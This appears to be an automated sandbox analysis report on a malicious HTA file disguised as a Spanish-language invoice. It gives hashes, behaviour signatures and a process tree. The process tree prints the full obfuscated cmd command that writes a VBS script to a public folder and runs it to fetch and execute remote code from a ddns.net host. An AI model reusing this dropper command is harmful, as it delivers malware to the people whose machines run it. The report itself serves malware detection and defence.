Analysis

  • max time kernel
    100s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231023-es
  • resource tags

    arch:x64arch:x86image:win10v2004-20231023-eslocale:es-esos:windows10-2004-x64systemwindows
  • submitted
    23-10-2023 19:31

General

  • Target

    SAC160504U42_COMPROBANTE_S970919JG1_FACTURASP_332461_MARG711102MB2_gVTKufbLVo6.hta

  • Size

    48KB

  • MD5

    20420b4fa418a91a3d745e48dacc4d9c

  • SHA1

    040be9423dc01fb91ff7ea848fb9403c735f50e6

  • SHA256

    1ad8a50c9315a914fbc345837676559acae4c0d1ac42f6ce0b4354c69729a60b

  • SHA512

    327b0840fcf6e9553e3b06df13d5709a4165f284306d34e28aa46f4b5524dc870e6c5e9a4943b3c135e47ef2638df42973817d33b48b198a3e47f5066dcf4dce

  • SSDEEP

    1536:CJPY1TSoDMFKb0PBY0+HOCPY1TSoDMFKb0PBY0+HOK:CW1+oAYgPBYNs1+oAYgPBYNp

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\SAC160504U42_COMPROBANTE_S970919JG1_FACTURASP_332461_MARG711102MB2_gVTKufbLVo6.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:844
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo|set /p=^"ne0Yz=".":VtGoc="i":dH0Riqm="g":NMugvLu=":":GetO^">C:\\Users\\Public\\chgzgR.vbs&echo|set /p=^"bject("sCr"+VtGoc+"pt"+NMugvLu+"hT"+"Tps"+NMugvLu+"//sac1"+ne0Yz+"ddns"+ne0Yz+"net//"+dH0Riqm+"1")^">>C:\\Users\\Public\\chgzgR.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\chgzgR.vbs
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2128
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo"
        3⤵
          PID:1292
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" set /p="ne0Yz=".":VtGoc="i":dH0Riqm="g":NMugvLu=":":GetO" 1>C:\\Users\\Public\\chgzgR.vbs"
          3⤵
            PID:4408
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo"
            3⤵
              PID:3320
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+VtGoc+"pt"+NMugvLu+"hT"+"Tps"+NMugvLu+"//sac1"+ne0Yz+"ddns"+ne0Yz+"net//"+dH0Riqm+"1")" 1>>C:\\Users\\Public\\chgzgR.vbs"
              3⤵
                PID:3476
              • \??\c:\windows\SysWOW64\cmd.exe
                c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\chgzgR.vbs
                3⤵
                • Checks computer location settings
                • Modifies registry class
                • Suspicious use of WriteProcessMemory
                PID:4492
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Public\chgzgR.vbs"
                  4⤵
                  • Blocklisted process makes network request
                  PID:528

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Public\chgzgR.vbs

            Filesize

            146B

            MD5

            a735c14e93a0b91011ad7d5c618117f9

            SHA1

            bb91f5a893d3b23b1696fba79e27ea728a9374af

            SHA256

            32fc1d2002831c9c6d995d34c8e306447c5ed3b8d079a1a274dda886fa11107c

            SHA512

            3062d9867980f78b5567bd63e1c57f7ad2599158025997fc09668db51639c2afaa97730e8b531e7ed655f00dad3185a5397fe9a4faa966fee0a1cb373df29ddd

          • C:\Users\Public\chgzgR.vbs

            Filesize

            146B

            MD5

            a735c14e93a0b91011ad7d5c618117f9

            SHA1

            bb91f5a893d3b23b1696fba79e27ea728a9374af

            SHA256

            32fc1d2002831c9c6d995d34c8e306447c5ed3b8d079a1a274dda886fa11107c

            SHA512

            3062d9867980f78b5567bd63e1c57f7ad2599158025997fc09668db51639c2afaa97730e8b531e7ed655f00dad3185a5397fe9a4faa966fee0a1cb373df29ddd